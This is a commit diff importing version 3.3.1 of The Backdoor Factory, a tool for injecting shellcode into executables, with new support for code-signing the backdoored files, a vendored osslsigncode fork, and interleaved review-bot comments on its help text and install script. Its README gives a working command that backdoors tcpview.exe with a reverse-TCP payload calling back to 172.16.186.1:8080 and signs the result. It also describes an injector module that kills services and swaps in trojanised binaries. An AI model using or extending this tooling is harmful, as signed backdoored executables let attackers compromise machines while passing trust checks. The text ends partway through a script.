Commit 15421d63 authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 3.3.1

parent 375791a9
......@@ -56,8 +56,12 @@ See the wiki: https://github.com/secretsquirrel/the-backdoor-factory/wiki
sudo pip install capstone
Pefile, most recent:
https://code.google.com/p/pefile/
https://code.google.com/p/pefile/
osslsigncode (included in repo):
http://sourceforge.net/p/osslsigncode/osslsigncode/ci/master/tree/
Kali Install:
......@@ -218,7 +222,40 @@ Sample Usage:
This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.
---
###PEcodeSigning
BDF can sign PE files if you have a codesigning cert. It uses osslsigncode.
Put your signing cert and private key in the certs/ directory. Prep your certs using openssl commands from this blog post:
http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html
Put your private key password in a file (gasp) as so (exactly as so):
echo -n yourpassword > certs/passFile.txt
Name your certs EXACTLY as follows:
signingCert.cer => certs/signingCert.cer
signingPrivateKey.pem => certs/signingPrivateKey.pem
Your certs/ directory should look excatly as so:
certs
├── passFile.txt
├── signingPrivateKey.pem
└── signingCert.cer
Enable PE Code Signing with the -C floag as so:
./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -H 172.16.186.1 -P 8080 -m automatic -C
On successful run you should see this line in BDF output:
[*] Code Signing Succeeded
---
###Hunt and backdoor: Injector | Windows Only
The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary "list_of_targets" in the 'injector' module for targets of your choosing.
......@@ -229,6 +266,14 @@ Sample Usage:
###Changelog
####12/20/2015
* Added directory paths to BDF to find certs directory.
####12/18/2015
* Added PE codesiging support. You must provide your own codesigning cert. See here: https://github.com/secretsquirrel/the-backdoor-factory#pecodesigning
####11/17/2015
* Bug fix in rsrc section for onionduke patching and remove of random win32 version value in PE Header
......@@ -62,7 +62,7 @@ def signal_handler(signal, frame):
class bdfMain():
version = """\
Version: 3.2.4
Version: 3.3.1
"""
author = """\
......@@ -282,6 +282,10 @@ class bdfMain():
"by calling this flag it will be put in a code cave. This can cause bianry "
"failure is some cases. Test on target binaries first."
)
parser.add_option("-C","--code_sign", dest="CODE_SIGN", default=False, action="store_true",
help="For those with codesigning certs wishing to sign PE binaries only. "
"Name your signing key and private key signingcert.cer and signingPrivateKey.pem "
"repectively in the certs directory it's up to you to obtain signing certs.")
(options, args) = parser.parse_args()
......@@ -307,7 +311,7 @@ class bdfMain():
print choice(menu)
print author
print version
time.sleep(1)
time.sleep(.5)
else:
print "\t Backdoor Factory"
print author
......@@ -442,7 +446,8 @@ class bdfMain():
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE
options.IDT_IN_CAVE,
options.CODE_SIGN,
)
supported_file.OUTPUT = None
supported_file.output_options()
......@@ -518,7 +523,8 @@ class bdfMain():
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE
options.IDT_IN_CAVE,
options.CODE_SIGN,
)
supported_file.injector()
sys.exit()
......@@ -556,7 +562,8 @@ class bdfMain():
options.PATCH_METHOD,
options.SUPPLIED_BINARY,
options.XP_MODE,
options.IDT_IN_CAVE
options.IDT_IN_CAVE,
options.CODE_SIGN,
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
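Review bot: The help text of the new `-C` option names the certificate file `signingcert.cer`, while the README added in this same commit tells the user to name it EXACTLY `certs/signingCert.cer`; on a case-sensitive filesystem one of the two instructions will lead to a file that the signing step cannot find, so the help string should match the README spelling. The same string also calls the certificate a "signing key" and contains the typo "repectively", and it does not mention the `certs/passFile.txt` password file the README requires. I would replace the three help lines with `help="Sign the patched PE binary with your own codesigning cert (PE only). "`, `"Place signingCert.cer, signingPrivateKey.pem and passFile.txt in the certs/ directory; "` and `"obtaining a signing cert is up to you.")`. Note that `options.CODE_SIGN` is also passed on the injector path and the generic pebin path, so the flag is silently accepted for inputs that are never signed; the enclosing argument-parsing and dispatch code of `bdfMain` starts and ends outside these hunks.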
# Ignore everything in this directory
*
# Except this file
!.gitignore
......@@ -16,6 +16,15 @@ uname -a | grep -i kali &> /dev/null
if [ $? -eq 0 ]; then
apt-get update
apt-get install -y python-capstone
echo '[*] Install osslsigncode'
cd osslsigncode
./autogen.sh
./configure
make
make install
cd ..
#install appack
uname -a | grep -i "armv" &> /dev/null
if [ $? -ne 0 ]; then
......@@ -44,6 +53,15 @@ if [ $? -eq 0 ]; then
echo '[!!!!] or install pip and retry'
echo ""
fi
echo '[*] Install osslsigncode'
cd osslsigncode
./autogen.sh
./configure
make
make install
cd ..
uname -a | grep -i "armv" &> /dev/null
if [ $? -ne 0 ]; then
echo "[*] installing appack for onionduke"
......@@ -62,6 +80,15 @@ fi
uname -a | grep -i Darwin &> /dev/null
if [ $? -eq 0 ]; then
pip install pefile
echo '[*] Install osslsigncode'
cd osslsigncode
./autogen.sh
./configure
make
make install
cd ..
cd ./aPLib/example/
clang -c -I../lib/macho64 -Wall -O2 -o appack.o appack.c -v
clang -Wall -O2 -o appack appack.o ../lib/macho64/aplib.a -v
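Review bot: Each of the three new osslsigncode blocks runs `cd osslsigncode`, `./autogen.sh`, `./configure`, `make` and `make install` without checking a single exit status, so if the `cd` fails the trailing `cd ..` moves the script one level above the repository and the rest of the branch (aPLib/appack build) runs in the wrong tree, and a failed build is only discovered later when `-C` never prints `[*] Code Signing Succeeded`. The block is also pasted verbatim three times; a single function using a subshell removes both the duplication and the stray `cd ..`. The vendored `configure.ac` in this commit needs autoconf/automake, pkg-config and the OpenSSL (and, by default, libcurl) headers, but the Kali branch only installs `python-capstone`, so the build will presumably fail on a fresh system unless those packages are added to the `apt-get install` line — worth confirming on a clean image. The subtree being built is, per its own README, a non-upstream fork of osslsigncode 1.7.1, and `make install` places it system-wide; the script should at least say so. The `if` branches that contain these blocks start and end outside the hunks.
```shell
install_osslsigncode() {
    echo '[*] Install osslsigncode (vendored Summit Route fork of 1.7.1, installed system-wide)'
    (cd osslsigncode && ./autogen.sh && ./configure && make && make install) || {
        echo '[!] osslsigncode build/install failed; PE code signing (-C) will not work'
        return 1
    }
}
# … unchanged: Kali detection …
    apt-get install -y python-capstone
    install_osslsigncode
# … unchanged: the other platform branches call install_osslsigncode the same way …
```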
.deps
Makefile
Makefile.in
aclocal.m4
autom4te.cache/
compile
config.h
config.h.in
config.h.in~
config.log
config.status
configure
depcomp
install-sh
missing
osslsigncode
osslsigncode.o
stamp-h1
.#*#
.*.bak
.*.orig
.*.rej
.*~
#*#
*.bak
*.d
*.def
*.dll
*.exe
*.la
*.lib
*.lo
*.orig
*.pdb
*.rej
*.u
*.rc
*.pc
*~
*.gz
*.bz2
=== 1.8 (2015-xx-xx)
- add support for pkcs11-based hardware tokens
(Patch from Leif Johansson)
- improved error reporting of timestamping errors
(Patch from Carlo Teubner)
=== 1.7.1 (2014-07-11)
- MSI: added -add-msi-dse option
(Patch from Mikkel Krautz)
- MSI: fix build when GSF_CAN_READ_MSI_METADATA defined
(Patch from Mikkel Krautz)
=== 1.7 (2014-07-10)
- add support for nested signatures
(Patch from Mikkel Krautz)
- fix compilation problem with OpenSSL < 1.0.0
- added OpenSSL linkage exception to license
=== 1.6 (2014-01-21)
- add support for reading password from file
- add support for asking for password (on systems that
provide support for it)
- add support for compiling and running on Windows
(Patch from Heiko Hund)
- fix compilation without curl
(Fix from Heiko Hund)
- added support for giving multiple timestamp servers
as arguments (first one that succeeds will be used)
- signatures on hierarchical MSI files were broken
(Fix from Mikkel Krautz)
- MSI: Add support for MsiDigitalSignatureEx signature
(Patch from Mikkel Krautz)
- add support for adding additional/cross certificates
through -ac option
(Thanks to Lars Munch for idea + testing)
- MSI: Add support for signature extract/remove/verify
(Patches from Mikkel Krautz)
- PE/MSI: Implement -require-leaf-hash for verify.
(Patch from Mikkel Krautz)
=== 1.5.2 (2013-03-13)
- added support for signing with SHA-384 and SHA-512
- added support for page hashing (-ph option)
=== 1.5.1 (2013-03-12)
- forgot to bump version number...
=== 1.5 (2013-03-12)
- added support for signing MSI files (patch from Marc-André Lureau)
- calculate correct PE checksum instead of setting it to 0
(patch from Roland Schwingel)
- added support for RFC3161 timestamping (-ts option)
- added support for extracting/removing/verifying signature on PE files
- fixed problem with not being able to decode timestamps with no newlines
- added stricter checks for PE file validity
- added support for reading keys from PVK files (requires OpenSSL 1.0.0 or later)
- added support for reading certificates from PEM files
- renamed program option: -spc to -certs (old option name still valid)
=== 1.4 (2011-08-12)
- improved build system (patch from Alon Bar-Lev)
- support reading cert+key from PKCS12 file (patch from Alon Bar-Lev)
- support reading key from PEM file
- added support for sha1/sha256 - default hash is now sha1
- added flag for commercial signing (default is individual)
=== 1.3.1 (2009-08-07)
- support signing of 64-bit executables (fix from Paul Kendall)
=== 1.3 (2008-01-31)
- fixed padding problem (fix from Ryan Rubley)
- allow signing of already signed files (fix from Ryan Rubley)
- added Ryan Rubley's PVK-to-DER guide into the README
=== 1.2 (2005-01-21)
- autoconf:ed (Thanks to Roy Keene)
- added documentation
- don't override PKCS7_get_signed_attribute, it wasn't
actually needed, it was me being confused.
- compiles without curl, which means no timestamping
- version number output
=== 1.1 (2005-01-19)
- Initial release
/*
OpenSSL based Authenticode signing for PE/MSI/Java CAB files.
Copyright (C) 2005-2014 Per Allansson <pallansson@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
In addition, as a special exception, the copyright holders give
permission to link the code of portions of this program with the
OpenSSL library under certain conditions as described in each
individual source file, and distribute linked combinations
including the two.
You must obey the GNU General Public License in all respects
for all of the code used other than OpenSSL. If you modify
file(s) with this exception, you may extend this exception to your
version of the file(s), but you are not obligated to do so. If you
do not wish to do so, delete this exception statement from your
version. If you delete this exception statement from all source
files in the program, then also delete it here.
*/
AUTOMAKE_OPTIONS = foreign 1.10
MAINTAINERCLEANFILES = \
config.log config.status \
$(srcdir)/Makefile.in \
$(srcdir)/config.h.in $(srcdir)/config.h.in~ $(srcdir)/configure \
$(srcdir)/install-sh $(srcdir)/ltmain.sh $(srcdir)/missing \
$(srcdir)/depcomp $(srcdir)/aclocal.m4 $(srcdir)/ylwrap \
$(srcdir)/config.guess $(srcdir)/config.sub
EXTRA_DIST = .gitignore
AM_CFLAGS = $(GSF_CFLAGS) $(OPENSSL_CFLAGS) $(OPTIONAL_LIBCURL_CFLAGS)
bin_PROGRAMS = osslsigncode
osslsigncode_SOURCES = osslsigncode.c
osslsigncode_LDADD = $(GSF_LIBS) $(OPENSSL_LIBS) $(OPTIONAL_LIBCURL_LIBS)
osslsigncode
============
== WHAT IS IT?
osslsigncode is a small tool that implements part of the functionality
of the Microsoft tool signtool.exe - more exactly the Authenticode
signing and timestamping. But osslsigncode is based on OpenSSL and cURL,
and thus should be able to compile on most platforms where these exist.
== WHY?
Why not use signtool.exe? Because I don't want to go to a Windows
machine every time I need to sign a binary - I can compile and build
the binaries using Wine on my Linux machine, but I can't sign them
since the signtool.exe makes good use of the CryptoAPI in Windows, and
these APIs aren't (yet?) fully implemented in Wine, so the signtool.exe
tool would fail. And, so, osslsigncode was born.
== WHAT CAN IT DO?
It can sign and timestamp PE (EXE/SYS/DLL/etc), CAB and MSI files. It supports
the equivalent of signtool.exe's "-j javasign.dll -jp low", i.e. add a
valid signature for a CAB file containing Java files. It supports getting
the timestamp through a proxy as well. It also supports signature verification,
removal and extraction.
== INSTALLATION
The usual way:
./configure
make
make install
== USAGE
Before you can sign a file you need a Software Publishing
Certificate (spc) and a corresponding private key.
This article provides a good starting point as to how
to do the signing with the Microsoft signtool.exe:
http://www.matthew-jones.com/articles/codesigning.html
To sign with osslsigncode you need the certificate file mentioned in the
article above, in SPC or PEM format, and you will also need the private
key which must be a key file in DER or PEM format, or if osslsigncode was
compiled against OpenSSL 1.0.0 or later, in PVK format.
To sign a PE or MSI file you can now do:
osslsigncode sign -certs <cert-file> -key <der-key-file> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-in yourapp.exe -out yourapp-signed.exe
or if you are using a PEM or PVK key file with a password together
with a PEM certificate:
osslsigncode sign -certs <cert-file> \
-key <key-file> -pass <key-password> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-in yourapp.exe -out yourapp-signed.exe
or if you want to add a timestamp as well:
osslsigncode sign -certs <cert-file> -key <key-file> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-t http://timestamp.verisign.com/scripts/timstamp.dll \
-in yourapp.exe -out yourapp-signed.exe
You can use a certificate and key stored in a PKCS#12 container:
osslsigncode sign -pkcs12 <pkcs12-file> -pass <pkcs12-password> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-in yourapp.exe -out yourapp-signed.exe
To sign a CAB file containing java class files:
osslsigncode sign -certs <cert-file> -key <key-file> \
-n "Your Application" -i http://www.yourwebsite.com/ \
-jp low \
-in yourapp.cab -out yourapp-signed.cab
Only the 'low' parameter is currently supported.
You can check that the signed file is correct by right-clicking
on it in Windows and choose Properties --> Digital Signatures,
and then choose the signature from the list, and click on
Details. You should then be presented with a dialog that says
amongst other things that "This digital signature is OK".
== CONVERTING FROM PVK TO DER
(This guide was written by Ryan Rubley)
If you've managed to finally find osslsigncode from some searches,
you're most likely going to have a heck of a time getting your SPC
and PVK files into the formats osslsigncode wants.
On the computer where you originally purchased your certificate, you
probably had to use IE to get it. Run IE and select Tools/Internet
Options from the menu, then under the Content tab, click the Certificates
button. Under the Personal tab, select your certificate and click the
Export button. On the second page of the wizard, select the PKCS #7
Certificate (.P7B) format. This file you export as a *.p7b is what you
use instead of your *.spc file. It's the same basic thing, in a different format.
For your PVK file, you will need to download a little utility called
PVK.EXE. This can currently be downloaded at
http://support.globalsign.net/en/objectsign/PVK.zip
Run: pvk -in foo.pvk -nocrypt -out foo.pem
This will convert your PVK file to a PEM file.
From there, you can copy the PEM file to a Linux box, and run:
openssl rsa -outform der -in foo.pem -out foo.der
This will convert your PEM file to a DER file.
You need the *.p7b and *.der files to use osslsigncode, instead of your
*.spc and *.pvk files.
== BUGS, QUESTIONS etc.
Send an email to pallansson@gmail.com
BUT, if you have questions related to generating spc files,
converting between different formats and so on, *please*
spend a few minutes searching on google for your particular
problem since many people probably already have had your
problem and solved it as well.
# This is NOT the official repo for osslsigncode
This project was copied from osslsigncode 1.7.1 to apply some patches for compiling with cygwin and being able to add unauthenticated blobs. The official source for the project is at: http://sourceforge.net/projects/osslsigncode/
## Features added
Adds the argument "-addUnauthenticatedBlob" to add a 1024 byte unauthenticated blob of data to the signature in the same area as the timestamp. This can be used while signing, while timestamping (new `add` command added to allow just time-stamping, after a file has been code signed, or by itself.
Examples:
```
# Example 1. Sign and add blob to unsigned file
osslsigncode sign -addUnauthenticatedBlob -pkcs12 yourcert.pfx -pass your_password -n "Your Company" -i https://YourSite.com/ -in srepp.msi -out srepp_added.msi
```
```
# Example 2. Timestamp and add blob to signed file
osslsigncode.exe add -addUnauthenticatedBlob -t http://timestamp.verisign.com/scripts/timstamp.dll -in your_signed_file.exe -out out.exe
```
```
# Example 3. Add blob to signed and time-stamped file
osslsigncode.exe add -addUnauthenticatedBlob -in your_signed_file.exe -out out.exe
```
```
# Example 4. Sign, timestamp, and add blob
# Technically you can do this, but this would mean your signing certificate
# is on a computer that is connected the Internet,
# which means you are doing something wrong,
# so I'm not going to show how to do that.
```
This technique (but not this project) is used by Dropbox, GoToMeeting, and Summit Route. You can read more about this technique here:
- https://tech.dropbox.com/2014/08/tech-behind-dropboxs-new-user-experience-for-mobile/
- http://blogs.msdn.com/b/ieinternals/archive/2014/09/04/personalizing-installers-using-unauthenticated-data-inside-authenticode-signed-binaries.aspx
## WARNING
The capability this adds can allow you to do dumb things. Be very careful with what you put in the unauthenticated blob, as an attacker could modify this. Do NOT under any circumstances put a URL here that you will use to download an additional file. If you do do that, you would need to check the newly downloaded file is code signed AND that it has been signed with your cert AND that it is the version you expect. You should consider using asymmetrical encryption for the data you put in the blob, such that the executable contains the public key to decrypt the data. Basically, be VERY careful.
## Compiling under cygwin
- Ensure you install the development libraries for openssl, libgfs, and curl.
- Install pkg-config
- Run
```
export SHELLOPTS
set -o igncr
./configure
make
```
## Download
- Compiled binary for cygwin: https://summitroute.com/downloads/osslsigncode.exe
- Compiled binary plus all the required DLL's (self-extracting exe): https://summitroute.com/downloads/osslsigncode-cygwin_files.exe
- signature extraction/removal/verificaton on MSI/CAB files
- improved signature verification on PE files
- clean up / untangle code
- separate timestamping
- man page
- remove mmap usage to increase portability
- tests
- fix other stuff marked 'XXX'
AC_PREREQ(2.60)
AC_INIT([osslsigncode], [1.7.1], [pallansson@gmail.com])
AC_CONFIG_AUX_DIR([.])
AC_CONFIG_HEADERS([config.h])
AM_INIT_AUTOMAKE
AC_CONFIG_SRCDIR([osslsigncode.c])
dnl Checks for programs.
AC_PROG_CC
AC_USE_SYSTEM_EXTENSIONS
AC_ARG_ENABLE(
[strict],
[AS_HELP_STRING([--enable-strict],[enable strict compile mode @<:@disabled@:>@])],
,
[enable_strict="no"]
)
AC_ARG_ENABLE(
[pedantic],
[AS_HELP_STRING([--enable-pedantic],[enable pedantic compile mode @<:@disabled@:>@])],
,
[enable_pedantic="no"]
)
AC_ARG_WITH(
[curl],
[AS_HELP_STRING([--with-curl],[enable curl @<:@enabled@:>@])],
,
[with_curl="yes"]
)
if test "${enable_pedantic}" = "yes"; then
enable_strict="yes";
CFLAGS="${CFLAGS} -pedantic"
fi
if test "${enable_strict}" = "yes"; then
CFLAGS="${CFLAGS} -Wall -Wextra"
fi
PKG_PROG_PKG_CONFIG
AC_PROG_CPP
AC_PROG_INSTALL
AC_PROG_LN_S
AC_PROG_MKDIR_P
AC_PROG_SED
AC_PROG_MAKE_SET
AC_C_CONST
AC_HEADER_STDC
AC_HEADER_TIME
AC_CHECK_HEADERS(
[sys/mman.h],
[AC_CHECK_FUNC(
[mmap],
[AC_DEFINE(HAVE_MMAP, [1], [Define to 1 if you have mmap])],
[AC_MSG_ERROR([Need mmap to build.])]
)],
[have_mmap=no]
)
AC_CHECK_HEADERS(
[windows.h],
[],
[have_MapViewOfFile=no]
)
AS_IF([test "x$have_mmap$have_MapViewOfFile" = "xnono"],
[AC_MSG_ERROR([Need file mapping function to buid.])])
AC_CHECK_LIB(
[dl],
[dlopen],
[DL_LIBS="-ldl"]
)
AC_CHECK_HEADERS([termios.h])
AC_CHECK_FUNCS(getpass)
AC_ARG_WITH([gsf],
AS_HELP_STRING([--without-gsf], [Ignore presence of libgsf and disable it])
)
AS_IF([test "x$with_gsf" != "xno"],
[PKG_CHECK_MODULES([GSF], [libgsf-1], [have_gsf=yes], [have_gsf=no])],
[have_gsf=no]
)
AS_IF([test "x$have_gsf" = "xyes"],
[AC_DEFINE([WITH_GSF], 1, [Have libgsf?])],
[AS_IF([test "x$with_gsf" = "xyes"],
[AC_MSG_ERROR([libgsf requested but not found])])]
)
PKG_CHECK_MODULES(
[OPENSSL],
[libcrypto >= 0.9.8],
,
[PKG_CHECK_MODULES(
[OPENSSL],
[openssl >= 0.9.8],
,
[AC_CHECK_LIB(
[crypto],
[RSA_verify],
[OPENSSL_LIBS="-lcrypto ${SOCKETS_LIBS} ${DL_LIBS}"],
[AC_MSG_ERROR([OpenSSL 0.9.8 or later is required. http://www.openssl.org/])],
[${DL_LIBS}]
)]
)]
)
PKG_CHECK_MODULES(
[LIBCURL],
[libcurl >= 7.12.0],
,
[AC_CHECK_LIB(
[curl],
[curl_easy_strerror],
[LIBCURL_LIBS="-lcurl"],
,
[${DL_LIBS}]
)]
)
if test "${with_curl}" = "yes"; then
test -z "${LIBCURL_LIBS}" && AC_MSG_ERROR([Curl 7.12.0 or later is required for timestamping support. http://curl.haxx.se/])
OPTIONAL_LIBCURL_CFLAGS="${LIBCURL_CFLAGS}"
OPTIONAL_LIBCURL_LIBS="${LIBCURL_LIBS}"
AC_DEFINE([ENABLE_CURL], [1], [libcurl is enabled])
fi
AC_SUBST([OPTIONAL_LIBCURL_CFLAGS])
AC_SUBST([OPTIONAL_LIBCURL_LIBS])
AC_CONFIG_FILES([Makefile])
AC_OUTPUT
#!/usr/bin/python
import struct
import sys
import hashlib
from pyasn1.type import univ
from pyasn1.codec.ber import encoder, decoder
f = open(sys.argv[1], 'rb')
filehdr = f.read(1024)
if filehdr[0:2] != 'MZ':
print "Not a DOS file."
sys.exit(0)
pepos = struct.unpack('<I', filehdr[60:64])[0]
if filehdr[pepos:pepos+4] != 'PE\0\0':
print "Not a PE file."
sys.exit(0)
pepos += 4
nsections = struct.unpack('<H', filehdr[pepos+2:pepos+4])[0]
print "#sections", nsections
magic = struct.unpack('<H', filehdr[pepos+20:pepos+22])[0]
pe32plus = 0
if magic == 0x20b:
pe32plus = 1
elif magic == 0x10b:
pe32plus = 0
else:
print "Unknown magic", magic
sys.exit(0)
sectoralign = struct.unpack('<I', filehdr[pepos+52:pepos+56])[0]
print "Sector alignment", sectoralign
pos = pepos + 112 + pe32plus*16
nrvas = struct.unpack('<I', filehdr[pos:pos+4])[0]
print "#rvas", nrvas
pos += 4
tpos = pos
rvas = []
for i in range(0, nrvas):
(p1,p2) = struct.unpack('<II', filehdr[pos:pos+8])
rvas.append((p1,p2))
pos += 8
sections = []
for i in range